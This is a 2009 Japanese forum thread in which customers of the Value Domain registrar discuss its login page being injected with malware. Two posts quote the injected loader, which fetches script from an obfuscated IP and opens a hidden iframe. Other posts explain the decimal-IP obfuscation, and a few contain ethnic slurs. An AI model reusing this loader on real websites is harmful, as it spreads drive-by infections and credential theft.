VALUE DOMAINってどうよ? part33at HOSTING
VALUE DOMAINってどうよ? part33 - 暇つぶし2ch33:名無しさん@お腹いっぱい。
09/07/06 17:44:36 0
何これpass抜きか何か?

34:名無しさん@お腹いっぱい。
09/07/06 17:45:36 0
URLリンク(safeweb.norton.com)

Norton セーフウェブが 110.165.41.103 を分析して安全性とセキュリティの問題を調べました。下に示すのは見つかった脅威のサンプルです。

見つかった脅威の合計: 8

脅威名: Trojan.Dropper
場所: URLリンク(110.165.41.103:888)

脅威名: Trojan.Dropper
場所: URLリンク(110.165.41.103:888)

脅威名: Trojan.Dropper
場所: URLリンク(110.165.41.103:888)

脅威名: Trojan.Dropper
場所: URLリンク(110.165.41.103:888)

脅威名: Trojan.Dropper
場所: URLリンク(110.165.41.103:888)

脅威名: Trojan.Dropper
場所: URLリンク(110.165.41.103:888)

脅威名: Trojan.Dropper
場所: URLリンク(110.165.41.103:888)

脅威名: Bloodhound.Exploit.193
場所: URLリンク(110.165.41.103:888)

35:名無しさん@お腹いっぱい。
09/07/06 17:51:16 0
このセキュリティの甘さは何なんだお?

36:名無しさん@お腹いっぱい。
09/07/06 17:53:58 0
完全に投げ出したか

37:名無しさん@お腹いっぱい。
09/07/06 17:58:22 P
俺のガマン汁もそろそろ限界だ。

38:名無しさん@お腹いっぱい。
09/07/06 17:58:57 0
これは
www.value-domain.com/
が乗っ取られたと解釈した方がいいのか?


39:名無しさん@お腹いっぱい。
09/07/06 18:05:00 0
wikiwikiもやられてるみたいだな。GENO系統だろ。
ここの管理者が感染してFTPパス抜かれたら被害すごいことになるんじゃね?

40:名無しさん@お腹いっぱい。
09/07/06 18:11:01 0
どうりで今日はデジロ社員が2ch工作してない訳だw
多分今頃、事務所は修羅場なんだろw

41:名無しさん@お腹いっぱい。
09/07/06 18:11:59 0
かんべんしてよマジで
IEだとデフォルトのセキュリティ設定で警告が出てくれるけど、Firefoxだと警告すら出ないから気がつかない

42:名無しさん@お腹いっぱい。
09/07/06 18:13:29 0
大丈夫かよデジロ

43:名無しさん@お腹いっぱい。
09/07/06 18:16:25 0
>>40
多分、社員はまだ気がついていないんじゃないかな
javascriptを削除するくらい数分でできるはず・・・社員がサーバーへのアクセス権限を失っていたら違う意味でやばいがね


44:名無しさん@お腹いっぱい。
09/07/06 18:28:27 0
もしパス抜かれてたら、パス変更したら大丈夫なの?

45:名無しさん@お腹いっぱい。
09/07/06 18:28:31 P
そもそも書き換えられたことが問題。


46:名無しさん@お腹いっぱい。
09/07/06 18:38:47 0
一時対応でとりあえずログインページは差し替えなきゃいけないだろ常考
差し替えたら取れなくなる資料は今のうちに取っておいて、
あとは原因追究、恒久的対応だろ

47:名無しさん@お腹いっぱい。
09/07/06 18:38:49 0
初心者的質問ですまんのだが、>>29にあるようなURLでどうして接続できるの?
あと、そのURLの謎の数字1856317799から、どうやってIPアドレスが辿れるの?
教えてエロい人。

48:名無しさん@お腹いっぱい。
09/07/06 18:39:08 0
とりあえず、マスコミに報告だ。

そうでもしなきゃ、隠蔽するだろ、ここ。

49:名無しさん@お腹いっぱい。
09/07/06 18:40:48 0
>>47
1856317799 = 0x6EA52967 = 110.165.41.0

50:名無しさん@お腹いっぱい。
09/07/06 18:41:30 0
すまん、

1856317799 = 0x6EA52967 = 110.165.41.103



51:名無しさん@お腹いっぱい。
09/07/06 18:52:04 0
0xの意味が理解できてないですけど、仕組みは分かりました。エロい人ありがとう。
ネット始めて10年にもなるのに、こんな表記の方法があるなんて恥ずかしながら知らなかったw
スレ汚し失礼しました。

52:名無しさん@お腹いっぱい。
09/07/06 18:57:31 0
こんな表記はスパムやウイルスのフィルターをかいくぐる目的以外では
まず使われないからな


53:sage
09/07/06 19:00:14 0
>>51
なにしろマイクロソフトもうっかりしていて、IEの脆弱性になっていたくらいだからな。


54:名無しさん@お腹いっぱい。
09/07/06 19:01:56 0
0xではじまるのは16進数

55:名無しさん@お腹いっぱい。
09/07/06 19:02:50 0
ところで、ns1-3.value-domain.com がひけないんだが、俺だけ?

56:名無しさん@お腹いっぱい。
09/07/06 19:04:48 0
110.165.32.0/19は香港のアドレスブロックか
相変わらず中国人はクソ以下だな

57:名無しさん@お腹いっぱい。
09/07/06 19:05:58 0
ns2が引けないな。1と3は引ける

58:名無しさん@お腹いっぱい。
09/07/06 19:08:30 0
>>55
そんなのもう5月の終わりからだぞw

59:名無しさん@お腹いっぱい。
09/07/06 19:09:29 0
ネームサーバも酷いな、とりあえずenomにして
あとはポイントを全部延長して使い切ってから他へ逃げる準備しとく

60:名無しさん@お腹いっぱい。
09/07/06 19:11:26 0
しっかし、これだけ対応悪いと、
過去に隠蔽された情報漏洩やハッキング被害がイパーイあるのでは?と疑いたくなる。


61:名無しさん@お腹いっぱい。
09/07/06 19:13:01 0
とりあえず、ITMediaとGIGAZINEには、このスレを報告しといた。

GIGAZINE、期待してるよ。

62:名無しさん@お腹いっぱい。
09/07/06 19:14:05 0
>>51
1856317799 = 110*256^3 + 165*256^2 + 41*256 + 103

0xは16進数を表す. 256=0x100だから, 16進で表せば2桁ごとに分解できる:

0x6EA52967 → 0x6E 0xA5 0x29 0x67
0x6E = 110
0xA5 = 165
0X29 = 41
0x67 = 103

63:名無しさん@お腹いっぱい。
09/07/06 19:17:27 0
>>62
もういいって
ping 1856317799
とでも打てばすぐに分かることだし


64:名無しさん@お腹いっぱい。
09/07/06 19:19:21 0
惰性のみでM調教受け続けてきましたがさすがにもう無理です。
ごめんなさいドSデジロご主人様。

65:名無しさん@お腹いっぱい。
09/07/06 19:20:43 0
・・・ns1, ns2, ns3、すべてなにも帰ってこないぞ。


66:名無しさん@お腹いっぱい。
09/07/06 19:24:00 0
>>65

>>16

先月1日あたりからアナウンスも一切無くずっと放置だよ

67:名無しさん@お腹いっぱい。
09/07/06 19:28:58 P
とりあえず垢のパスは変えた方がいいのかな?どうなのかな?

68:名無しさん@お腹いっぱい。
09/07/06 19:31:50 0
おちおちコンパネにログインすらできんってどうよ
移管もできねーじゃん

69:名無しさん@お腹いっぱい。
09/07/06 19:32:13 0
>>66

これって死にッぱなし・・・じゃないよね?
だったらHPもメールも動かなくなるわけだし。



70:名無しさん@お腹いっぱい。
09/07/06 19:35:33 0
>>69
orz.2ch.ioとかの登録されているアドレスじゃないと何も返って来ないぞ。


71:名無しさん@お腹いっぱい。
09/07/06 19:44:32 P
知らずにログインしてた…
念のためJavaSciprt無効化してからログインしてパスワード変更したよ。

72:名無しさん@お腹いっぱい。
09/07/06 19:57:50 0
>>67
コンパネのパスを抜かれるって事はxreaのログイン情報から
メールのパスワードまで全部つながって見えるって事だから
とりあえず、JavaSciprtをoffにしてパスワードを変更した。

73:72
09/07/06 20:04:17 0
追加。
よく考えたらxreaどころじゃねぇ、
抜かれたパスワードからさらに他のパスワードに換えられたら、
こっちが何も出来ないまま、nsの変更どころかドメインを他人に移籍まで自由に出来るって事だ。
ログイン履歴をメモしておかないとな。
自分が寝ているハズの時間のログイン記録があるかもよ。

74:名無しさん@お腹いっぱい。
09/07/06 20:07:31 0
わざわざ今ログインしてる人って頭XXXXX

75:名無しさん@お腹いっぱい。
09/07/06 20:15:16 0
改ざんされてる割には
あまり騒いでないな


76:名無しさん@お腹いっぱい。
09/07/06 20:27:01 0
JavaScriptを埋め込めるってことは、ログイン情報がポストされるPHPを改ざんすることも可能では?
つまり、JavaScriptを無効にしたところで、受け側のPHPの処理を信用できないのでログインは冒険だってことだ。
今はログインせずに、アナウンスを待つよりほかない。


77:名無しさん@お腹いっぱい。
09/07/06 20:29:44 0
他社で取得したco.jpドメイン運用しているんだけど、
NS1-3.VALUE-DOMAIN.COMを指定しちゃだめってこと?



78:名無しさん@お腹いっぱい。
09/07/06 20:31:10 0
まさか本当にGENO系?
それならvalue-domain.comのFTPパス抜かれたってことか
最悪だ

79:名無しさん@お腹いっぱい。
09/07/06 20:36:44 0
GENO系かどうかはわからないけど、login.phpが改竄されたってことは
少なくともftpの垢パスが漏れていると言う事実は変わらない。
もしかしたらもっと上位の垢パスの可能性だってある。

80:名無しさん@お腹いっぱい。
09/07/06 20:58:10 0
ログインにトロイ埋め込まれてて、香港のサーバになんか飛ばしてるのか
これ、どう処理するんだろ
適当にパスワード変更してください、って告知して、また100日無料期間追加程度で終わるのかな

81:名無しさん@お腹いっぱい。
09/07/06 21:49:42 0
やばいよよばいよ

82:名無しさん@お腹いっぱい。
09/07/06 21:52:07 0
まだ直ってないの?

83:名無しさん@お腹いっぱい。
09/07/06 22:12:14 0
>>32のs.jsって本当にあるね……
俺、javascriptってよくわかんないんだけど、
ようするに、ログインしたら、ログインページのheadタグの後に、別のサーバのshow.phpってやつを差し込まれて何かされてるってこと?

84:名無しさん@お腹いっぱい。
09/07/06 22:14:53 0
この先いったいどうなることやら

85:名無しさん@お腹いっぱい。
09/07/06 22:20:19 P
URLリンク(www.value-domain.com)

<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement("script");
js.src = "URLリンク(1856317799:888)";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>


URLリンク(www.value-domain.com)
<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement("script");
js.src = "URLリンク(1856317799:888)";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>

当たり前だけ両方あるな


86:名無しさん@お腹いっぱい。
09/07/06 22:27:49 P
s.jsの中身

/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf("O=")==-1)
{
var js = document.createElement('iframe');
js.src = "http:\/\/0x6EA52967:888/dir/show.php";
js.width=0;
js.height=0;
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;

var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="O=Yes;path=/;expires="+expires.toGMTString();
}/*dasdadadsadasdas*/


http:\/\/0x6EA52967:888/dir/show.php

URLリンク(110.135.41.103)

87:名無しさん@お腹いっぱい。
09/07/06 22:31:58 0
To: 85-86

>>31-32がなぜわざわざ全角にしたのか, >>34がなぜhttpでなくtpにしたのか,
考えてみよう.

88:名無しさん@お腹いっぱい。
09/07/06 22:33:17 0
>>85
>>86
既出
上で書いてあることをいちいち書き込まなくてよろしい
しかも香港鯖にリンクを貼るなや

89:名無しさん@お腹いっぱい。
09/07/06 22:40:35 0
ウィルスURLを張るのは普通に通報対象です

90:名無しさん@お腹いっぱい。
09/07/06 22:46:18 0
で、肝心のデジロは把握してるの?

91:名無しさん@お腹いっぱい。
09/07/06 22:49:31 0
把握していないのでは?
<script>~</script>を削除するくらい一瞬で終わる

92:名無しさん@お腹いっぱい。
09/07/06 22:51:23 0
誰かが魚拓とってくれたみたいだ。

URLリンク(www.value-domain.com)">URLリンク(s03.megalodon.jp))

93:名無しさん@お腹いっぱい。
09/07/06 22:52:08 0
試しに問題のURLを確認してみた

問題の飛ばされる先のm.htmに、ノーガードで突っ込んでみると、
XPだと、
ドライブ:/Documents and Settings/ユーザ名/Application Data
のフォルダの中に、a.exeというファイルがコピーされ、regeditいじってたら、気がついたら消えてた。実行されたのだろうか

詳細は不明
何かがやられているのは確かだ

実験するのは自己責任で

94:名無しさん@お腹いっぱい。
09/07/06 22:56:05 0
つーことは、ログインするとパスが抜かれるのではなく、
ログインページを開くだけで感染するってこと?

95:名無しさん@お腹いっぱい。
09/07/06 22:59:41 0
>>93に追記

ログをおったら、Keyloggerを検知した
やはりパスワード抜きで確定だと思う

96:名無しさん@お腹いっぱい。
09/07/06 23:06:19 0
要は javascript 実行させない環境で見れば
問題ないのかな

普段はFireFox+ NoScriptで普段はjavascript
実行させないようにしてるけど・・・

97:名無しさん@お腹いっぱい。
09/07/06 23:07:53 0
>>95に追記

カスペルスキーを実行させながら再実験するとこんな感じになった
そんなスクリーンショット
URLリンク(www.dotup.org)

これは酷い

98:名無しさん@お腹いっぱい。
09/07/06 23:12:33 0
login.phpに<script>を埋め込むことができるなら、
login.phpのログイン時の処理にも細工がしてある可能性もある

JavaScriptを無効にしていても、php内部の処理まではどうなっているのか分からないので、ログインしない方が無難


99:名無しさん@お腹いっぱい。
09/07/06 23:13:36 P
>>93
踏んだけどなかったなぁ
そもそもそのURL鯖落ちしてないか?

100:名無しさん@お腹いっぱい。
09/07/06 23:16:19 0
URLリンク(www.value-domain.com)
にアクセスするだけで感染?

101:名無しさん@お腹いっぱい。
09/07/06 23:19:14 0
>>98
確かにそうだね
しかしそろそろドメインの更新できないと困る・・・

しかも他ではあんまり扱ってないドメインだから
移管するのも面倒だし

102:名無しさん@お腹いっぱい。
09/07/06 23:22:45 0
Windows以外のOSかVistaでアクセスした方がいいね

103:名無しさん@お腹いっぱい。
09/07/06 23:23:20 0
>>93 >>95 >>97だけど、こうなるのは本当に全くなにも対策してない場合だけだと思う。完全にXPをノーガードの素の状態で試したから
ちゃんと最新のセキュリティソフト入ってるなら大丈夫、だとは思う
カスペルスキーを立ち上げた状態でウイルスらしき実行ファイルやったら、なんか防いでるっぽかった。ブラウザがフリーズしたけど

m.htmのほうはこんな感じ、show.phpのほうは何も吐き出してこないから、何やってるか全く不明。

正直、なんともいえんけど、
とりあえず、実験に使ったPCは念を入れて、リカバリ中

104:名無しさん@お腹いっぱい。
09/07/06 23:26:20 0
>>101
ccTLDは基本的に移管できないよ
認証鍵があるtvは移管できるかもしれないけど

105:名無しさん@お腹いっぱい。
09/07/06 23:27:24 0
>>102
HDDはずしてubuntuをCD-ROMブートで使うのが
セキュリティ上いいのかしら(´・ω・`)

Winのセキュリティソフトもすぐ対応してくれないと
意味ないし・・・

106:名無しさん@お腹いっぱい。
09/07/06 23:28:31 0
avastは検出してくれないなぁ~
このキーロガーは、VDのパスを狙っているのではなく、
VD利用者が日頃入力するパスを狙ってるってことかな?

107:名無しさん@お腹いっぱい。
09/07/06 23:35:44 0
GENO系統ならフラッシュかPDFで感染させてFTPパスを抜いてそのパス使ってサイトの改竄する。


108:名無しさん@お腹いっぱい。
09/07/06 23:42:28 0
>>102
phpの内部処理まではサーバのほうで処理することでこっちはなにも見れないから、そこまで改ざんということなら、もうOS関係ないと思う
ログインすることそれ自体が危険

109:名無しさん@お腹いっぱい。
09/07/06 23:47:00 O
夕方ログインした
もう、手遅れだろうから
全部諦める事にしたよ
大規模な改ざんが来そうだね

110:名無しさん@お腹いっぱい。
09/07/07 00:04:41 0
ログイン出来なきゃサポにも連絡できねえ。
問題が大きくなる前に対処しないとやばいんじゃね?

111:名無しさん@お腹いっぱい。
09/07/07 00:16:30 0
今は消えてるみたい。やっと気づいたかな?
でも、相変わらず報告なしだなぁ

112:名無しさん@お腹いっぱい。
09/07/07 00:20:36 0
今北
何?ログインページにロガー仕込まれたの?マジで??
今確認する分にはヘンなスクリプトは入ってなさげだけど…
マジで仕込まれていたなら事は重大だなあ

デジロは早急に今判っていることだけでもアナウンスすべき

113:名無しさん@お腹いっぱい。
09/07/07 00:25:57 0
本当だ、いつのまにかなくなってる
でも、>>92で魚拓もうとられてるし、これはさすがにアナウンス無しってことはないと思・・・・・・いたい
この期間にログインしてた人は、気がついたら自分のところ改ざんされてもおかしくないしな

114:名無しさん@お腹いっぱい。
09/07/07 00:26:31 0
社員がここを見て気づくというオチ

115:名無しさん@お腹いっぱい。
09/07/07 00:30:46 0
多分直接関係ないとはいえ、
お知らせ欄の「セキュリティ強化について」の文字が妙にむなしく感じる…


116:名無しさん@お腹いっぱい。
09/07/07 00:40:06 0
ユーザーが視認できるJavaScriptが削除されたにせよ、login.phpの内部処理が改竄されていたかどうかはユーザーには分からない。
一見対応されたかに見えても、プログラム内部の見えない部分まで確認したのかどうかは、VDのアナウンスを待つしかない。

login.phpが改竄されていたことには変わらない。
まだ危険は去っていないと考えるべきで、アナウンスがあるまでログインはおろか、
URLリンク(www.value-domain.com)
を開くことも控えるべき

117:名無しさん@お腹いっぱい。
09/07/07 00:44:17 0
DNSくらいは別に他使えばよかったけど、これはさすがにやっちまったなぁ……
VDは前、サーバー復旧できなくてサーバ丸ごと初期化したこともあったけど、
今回の問題はどこまで被害がでてるかわからないから、それなみのクラスの問題だな

118:名無しさん@お腹いっぱい。
09/07/07 00:52:06 P
ふぅ、
とりあえずjs切ってパス変えて、あどべ関連も一応最新チェックしといた。

俳人(廃人)の俺がここで一句
面倒くせぇ あぁ面倒くせぇ 面倒くせぇ

119:名無しさん@お腹いっぱい。
09/07/07 00:53:06 0
>>116
login.phpが書き換えられたというよりも、
login.phpから読み込まれる別のファイルなりデータベースなりが書き換えられてるような気がする。
ユーザー名、パスワード、挿入されたscriptタグが、同じ形に整えられてるからな。
よくあるSQLインジェクションみたいなもんじゃないかなー

120:名無しさん@お腹いっぱい。
09/07/07 00:53:39 0
改竄されていたのは login.php だけだったのか?
という疑問も残っている。

ログイン情報は、cookieに保存されるので、各ページのphpファイル内でcookieデータが送受信される。つーことは全phpファイルに改竄がなかったかチェックする必要がある。
どのページからでも情報漏洩の危険はあるってことだ。
さらに各phpファイルが内部でインクルードしていれば、そのファイルも全てチェックする必要がある。

このくらいできるよね>VD社員

121:名無しさん@お腹いっぱい。
09/07/07 00:59:41 0
とりあえずサポートフォームから
「事は重大だから最低でも朝イチでアナウンスが欲しい」
っと送っておいた
質問カテゴリ=利用前質問ならログイン無しでも送信できるしな
今の状況下でログインなんか怖くてできない

122:名無しさん@お腹いっぱい。
09/07/07 01:11:13 0
スレをちゃんと読まずに、>>72>>118と同様、ログインしてパス変えてしまった

login.phpの内部処理が改竄されていた場合、ログインしたユーザーには
どんな被害があるの。whois情報が流出くらいならまだ許容できるんだけど

123:名無しさん@お腹いっぱい。
09/07/07 01:12:38 0
phpまでやられてたら、サーバでできることはほとんどなんでもできるよ

124:名無しさん@お腹いっぱい。
09/07/07 01:22:21 0
まあとにかく今は、VDの鯖がどの程度の被害を被ったのかアナウンスを待とうや

phpの内部処理が改竄されている可能性を考慮すると、
・JavaScriptをOFFにしてログインする
・以前のログイン情報がcookieに残っているユーザー(ログイン状態を維持しているユーザー)が、VDのサイトを開く

ってのも控えたほうがいいと思われる。

つまりアナウンスを見に行くのですら気を使う必要があるかもね
既存のcookieを削除してから訪問するとか、ブラウザを変えるとか・・・


125:名無しさん@お腹いっぱい。
09/07/07 01:27:20 P
>アナウンスを待とうや

そのアナウンスが、素直に出てくるとでも思っているのかい?

126:名無しさん@お腹いっぱい。
09/07/07 01:36:45 0
んなこた知るか
当然すべきことを期待しているだけだ

通信法、個人情報保護法etc・・・VDがどこまで法を犯すのかというのも楽しみではあるがね


127:名無しさん@お腹いっぱい。
09/07/07 01:50:45 0
当然すべきことを期待しているだけだ(大爆笑)

128:名無しさん@お腹いっぱい。
09/07/07 02:02:31 0
たまたま見たらこんなことに・・・涙
ドメイン100個以上使っているのでドビックリしてます。

129:名無しさん@お腹いっぱい。
09/07/07 02:10:20 0
>>128
何度目のビックリですか?

130:名無しさん@お腹いっぱい。
09/07/07 02:19:20 0
この程度でビックリしているようじゃここは使えませんよ

131:名無しさん@お腹いっぱい。
09/07/07 02:28:16 0
当然すべき事を意地でも徹底放置するのがデジロじゃないかw

132:名無しさん@お腹いっぱい。
09/07/07 02:33:57 0
なんでここって重大な障害等が発生してもいつも一切アナウンスしないの?

133:名無しさん@お腹いっぱい。
09/07/07 02:36:43 0
重大な障害じゃないんだよ。
ここでは鯖が1台どこかに消えちゃったとかが重大な障害

134:名無しさん@お腹いっぱい。
09/07/07 02:37:54 0
入金やカネに関する事はマメにアナウンスするのになw
逆に言うとそれ以外の事は一切アナウンスしないw

135:名無しさん@お腹いっぱい。
09/07/07 02:39:30 0

アナウンスしたら負けだと思っています



136:名無しさん@お腹いっぱい。
09/07/07 02:44:17 P
これから他の鯖屋工作員も加勢して、賑やかなスレになりそうだね。
ギガジンが記事にしたらもぅ、それこそ七夕祭りだな(ワラ

137:名無しさん@お腹いっぱい。
09/07/07 02:45:41 0
分かってない奴が多いねえ
鯖の障害をアナウンスしなかったこととは、チト違ってくる
法が絡むでのぉ

138:名無しさん@お腹いっぱい。
09/07/07 02:48:34 0
どんな法がどう絡んでくるの?
具体的にどうぞ。

139:名無しさん@お腹いっぱい。
09/07/07 02:54:46 0
いちいち聞くな、自分で調べろ
おっと、こーゆーときに「ググレカス」ってんだっけ

140:名無しさん@お腹いっぱい。
09/07/07 03:00:47 0
そんなわかりやすい逃げ打たれてもw
裏付けできないテキトーな事言うなって

141:名無しさん@お腹いっぱい。
09/07/07 03:12:56 0
規約にこんなこと書いてあるからVDはなにもしなくてもOK
やるかやらないかはもはやVDの気分次第


VALUE DOMAIN サービス利用規約
 利用者は日本国内に在住で、且つ、日本語を理解できるものとします。

【責任の限界について】
 以下の事項に起因して発生する可能性のある損失について、
 当社及び上位レジストラは、利用者あるいは第三者に対して責任を負わないことに、
 利用者は同意するものとします。

●あらゆる原因によって起こるドメインネーム登録の未完了、不可、損失
●あらゆる非常事態が発生したことによる損失

142:名無しさん@お腹いっぱい。
09/07/07 03:14:21 0
ググレカスって
逃げ口上にも使えるんだなあ
               みつを

143:名無しさん@お腹いっぱい。
09/07/07 03:16:57 0
なんつーか、毎度のことながら、鯖がクラックされるって酷すぎだよな
また保守管理を委託してるシナ人の仕業なんじゃね?
あいつら、何度注意したって聞かねーし

144:名無しさん@お腹いっぱい。
09/07/07 03:29:44 0
次はどんなハード調教をしてくれるんだろうと更なる期待が高まる

145:名無しさん@お腹いっぱい。
09/07/07 03:47:48 0
次から次に、ここは何かとネタが尽きんなぁ・・・

146:名無しさん@お腹いっぱい。
09/07/07 04:04:57 0
今回の件すらアナウンスしないのなら引っ越しするかな

147:名無しさん@お腹いっぱい。
09/07/07 04:13:48 0
俺は特定のドメイン以外は2月の障害の時点で全部移管したよ。

148:名無しさん@お腹いっぱい。
09/07/07 04:31:14 0
どこに移管したんだよ

149:名無しさん@お腹いっぱい。
09/07/07 04:35:58 0
>>148
毎度w

150:名無しさん@お腹いっぱい。
09/07/07 06:10:39 0
>▼2009.07.02
>セキュリティ強化について

率先して強化しなければならないセキュリティーを間違えてるだろw

151:名無しさん@お腹いっぱい。
09/07/07 06:16:46 0
>>31-32 の件ですが、msvidctl.dllの脆弱性です。
アドバイザリ出ました。
URLリンク(www.microsoft.com)
レジストリにkill bitを立てるか、以下の「Fix it」を押しましょう。
URLリンク(support.microsoft.com)

他にpdfとswfも併用されていますが、こちらは既知の脆弱性なので
AdobeReaderやFlashPlayerが最新バージョンであれば問題ありません。

152:名無しさん@お腹いっぱい。
09/07/07 07:48:48 0
現時点でもまだVDログインページは修正されてないの?

153:名無しさん@お腹いっぱい。
09/07/07 08:24:17 P
>>151
乙加齢臭

154:121
09/07/07 08:25:23 0
おはよう
朝起きたらサポートからの回答か3件も入っていてビビッた。いつものように放置だと思っていたのに。
コピペは控えるけど要約すると

・カスタマーサポート(受付部門)には「弊社担当部門(メンテ担当?)」からの報告が無い
・担当部門への申し送りは行う
・真偽確認&アナウンスは担当部門の対応となる

ってところかな。一応、事の重大さは認識しているようだ。

気になるのは「担当部門からの報告がない」ってところ。
つまり、昨日深夜にスクリプトが外れたのは、VDの操作ではなく、
仕掛けた本人による操作の可能性もあるということだ。

正式アナウンスがあるまで、ログインは控えた方が良いな。

155:名無しさん@お腹いっぱい。
09/07/07 08:28:02 0
しかし、速報でも何でも、公式アナウンスは絶対しないんだw
ある意味潔いよねw デジロイズムw

156:名無しさん@お腹いっぱい。
09/07/07 08:41:44 0
いつも事あれば全て「担当部門(外注)」だな・・・

157:名無しさん@お腹いっぱい。
09/07/07 08:51:22 0
去年の広告鯖ウイルス混入の件の再来って感じだね

158:名無しさん@お腹いっぱい。
09/07/07 09:18:14 P
誰か高木先生にチクってよ

159:名無しさん@お腹いっぱい。
09/07/07 09:29:38 0
今wiki見たら前のウイルス事件の内容はいつの間にか記事削除されてるw
社員さんもそういう熱意を肝心なとこに向けてくれたらいいのにw

160:名無しさん@お腹いっぱい。
09/07/07 09:36:53 0
>>154
認識はいつも早いんだけど、その後放置でアナウンスせず黙殺だからいつもと変わらないのでは?
クレームにそういった内容の定型文を即返すって対応は従来通りだし

しかし、これくらいの修正すら即できない人間しか社内にいないのか?
外部丸投げがデフォでもちょっとひどすぎだろ

161:名無しさん@お腹いっぱい。
09/07/07 09:49:34 0
>>154
今回もやっぱり文末は
「騒がず黙って○週間待ってろカス共 ○週間の間は再度文句垂れてきてもシカトだからなコラ(意訳)」
な訳?

162:名無しさん@お腹いっぱい。
09/07/07 09:51:14 0
:::::::::::::::(>'A`)> ウワァァァァ :::::::
:::::::::::::::( へへ :::::::::::::::::::::::::::::::::

163:名無しさん@お腹いっぱい。
09/07/07 09:58:58 0
今更ながら・・・







これはひどい

164:121
09/07/07 10:07:51 0
>>160
そーかもしれないけど、客としては待つしかないしなあ。
でも、俺も過去何度かサポートとやりとりしてるけど、深夜に送った奴に
深夜のウチに打ち返してきたのは初めてだったよ。

>>161
いや、見慣れたその定型文は今回は無いよ。

今回の件は顧客の財産(金やドメイン)に直接影響する問題なので
迅速かつ的確な対応をお願いしたいですな、VD様。

165:名無しさん@お腹いっぱい。
09/07/07 10:11:20 0
たしかにドメイン絡みで各種情報ぶっこ抜かれて改竄でも
やられたら洒落にならん。
ここで管理してるあと数個のドメインも、あと少しで移管可
になるんで全部移管したいが怖くてログインできん。

166:名無しさん@お腹いっぱい。
09/07/07 10:15:40 0
今はログインしても大丈夫? まだ駄目?

167:名無しさん@お腹いっぱい。
09/07/07 10:18:30 0
今回、ログイン部分が改ざんされ個人情報が脅かされたわけだろ?

5000件以上の個人情報をデータベース等として所持し事業に用いている事業者は
必然的に個人情報取扱事業者に該当するんだよ。
該当する場合は個人情報保護法に乗っ取った運営をしなければならない。
今回、こういう被害受けたからには、デジロック側が個人情報保護法に基づき総務省に報告義務がある。
まさか登録者5000件未満というわけでも無さそうだし。

それ以外にも、以前にも似たようなことがあったということから、
電気通信事業者としても注意義務違反にあたるかもしれない。
ここらへんは詳細わからないことには判断できないが。

とにかく、このまま放置で済む問題ではないのは確実だ。

168:名無しさん@お腹いっぱい。
09/07/07 10:22:10 0
何が入ってるかわからんからログインするな。

169:名無しさん@お腹いっぱい。
09/07/07 10:32:17 0
>>154
やっぱり、「担当部門」=「前回広告鯖をクラックしたシナ人」=「今回ログインフォームを改ざんした犯人」なんじゃね?
だから、デジロの中の人が真偽確認してもレスポンスが悪い、と

もう、大阪人は信用ならんなぁ

170:名無しさん@お腹いっぱい。
09/07/07 10:34:23 0
大阪は大阪民国法が適用されるから日本国の法律には準拠しないよ

171:名無しさん@お腹いっぱい。
09/07/07 10:37:02 0
なんかサポ板の挙動がおかしいのもこの改竄の件関係あるのかな?
それとも6月頭から完全放置のネームサーバ障害のせいかな?

172:名無しさん@お腹いっぱい。
09/07/07 11:25:47 0
これだけ被害だしといて、告知すらないとかありえないわ。
ウイルス配布元として訴えられてもしょうがないレベル

173:名無しさん@お腹いっぱい。
09/07/07 11:40:54 0
別にデジロック擁護する気はないけど、被害って言ってもまだ別に表立った実害って報告されてないでしょ?
徹底的に祭り上げられるか否かは今後の動向次第じゃないかな現時点では

速報なり何なりで即時何かしらの公式アナウンス出すべきだとは思うけどね
後に大事になった時に、認知しながらも被害拡大させた責任追及されて一番困るのはデジロックだろうから

174:名無しさん@お腹いっぱい。
09/07/07 11:49:39 0
て言うかまだ今の時点でログインページは改ざんされてるの?
どっちにしてもデジロが何もユーザーに対して説明しないと怖くてコンパネ入れないけど・・・

175:名無しさん@お腹いっぱい。
09/07/07 11:52:48 0
ここはいつも通り、自然治癒力に頼るしか方法はありません

176:名無しさん@お腹いっぱい。
09/07/07 12:07:15 0
どうせまた内部犯行だろ

177:名無しさん@お腹いっぱい。
09/07/07 12:12:50 0
技術者が逃げて外注に頼ってもお金が無くて素性の確かでない安いところに
頼んで乗っ取られたとかじゃない?

178:名無しさん@お腹いっぱい。
09/07/07 12:25:29 0
結局どうだったの?改竄はあったの?

179:名無しさん@お腹いっぱい。
09/07/07 12:30:18 0
GENOみたいな商売ならだんまりでも
「まあGENOだしな」で済むだろうけど
ここは腐っても鯖屋だぜ?
なるべく早急にまともな対応をしないと
冗談抜きに取り返しのつかないことになるかと

180:名無しさん@お腹いっぱい。
09/07/07 12:32:09 0
改ざんがあったかどうかなんて、ログくらいよめよ
90レス番台あたりとかに、全部のってるじゃん

181:名無しさん@お腹いっぱい。
09/07/07 12:41:01 0
デジロなんて、コアサーバーの殆どが児童ポルノサイト運営させて沢山あるくらいだしな
全く何とも思ってないよ

182:名無しさん@お腹いっぱい。
09/07/07 12:43:35 0
もしなんらかの損害が発生しても、
「あらゆる非常事態が発生したことによる損失」に対する責任は負いません
そういう規約ですから

183:名無しさん@お腹いっぱい。
09/07/07 12:45:09 0
login.php を元に戻したのが誰かが分からない限り、ログインするのは危険。

デジロが対応したのなら、そのことを告知すべき、
公式告知がない=仕掛けた奴が操作している可能性あり。すると、ログインは危険

184:名無しさん@お腹いっぱい。
09/07/07 12:48:42 0
待て…
よく考えるんだ…

これはトラブル続きで移管転出続出のデジロが仕組んだ逆転捨て身の移管防止策…!?

185:名無しさん@お腹いっぱい。
09/07/07 12:51:55 0
捨て身過ぎるだろw

186:名無しさん@お腹いっぱい。
09/07/07 12:57:28 0
ああそうか、鯖に安全宣言がなされてなければ、
じつはPOSTの受け取りを細工されてて、生パスが抜かれるかもしれんわけね

187:名無しさん@お腹いっぱい。
09/07/07 13:07:53 0
URLリンク(www.itmedia.co.jp)

Windowsにゼロデイの脆弱性、サイト改ざん攻撃が多発

MicrosoftのVideo ActiveX Controlにゼロデイの脆弱性が発覚した。何千ものWebサイトが改ざんされ、閲覧しただけでマルウェアに感染する状態になっているという。

